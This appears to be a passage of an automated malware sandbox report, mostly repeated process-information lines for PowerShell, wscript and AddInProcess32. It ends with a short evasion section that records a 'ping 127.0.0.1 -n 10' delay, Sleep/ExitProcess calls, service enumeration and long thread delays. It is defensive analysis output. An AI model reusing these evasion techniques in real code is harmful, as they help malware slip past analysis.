                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041A8DA
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040E18D Sleep,ExitProcess,11_2_0040E18D
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_004186FE
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
